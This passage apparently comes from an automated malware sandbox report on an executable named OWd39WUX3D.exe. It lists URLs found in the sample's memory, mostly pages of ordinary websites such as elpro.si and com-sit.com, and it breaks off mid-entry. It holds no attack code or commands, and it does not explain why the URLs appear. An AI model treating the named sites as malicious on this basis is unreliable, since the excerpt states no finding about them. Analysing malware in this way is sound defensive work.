              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F&format=xm
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/wp/v2/pages/46
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/x-ray/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/xmlrpc.php?rsd
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/zertifikate/
              Source: OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.388882923.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.crcsi.org/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485097680.0000000006C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.credo.edu.pl/
              Source: OWd39WUX3D.exe, 00000000.00000003.482754637.0000000006B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dgmna.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387197589.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.490572448.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.edimart.hu/
              Source: OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si
              Source: OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/
              Source: OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#/schema/logo/image/
              Source: OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#breadcrumb
              Source: OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#organization
              Source: OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#primaryimage
              Source: OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#website
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/?s=
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/aaa-boniteta-odlicnosti-2023/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/avtorji/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/category/aktualno/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/disclaimer/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/elpro-laboratorij-za-kalibracije/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/en/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 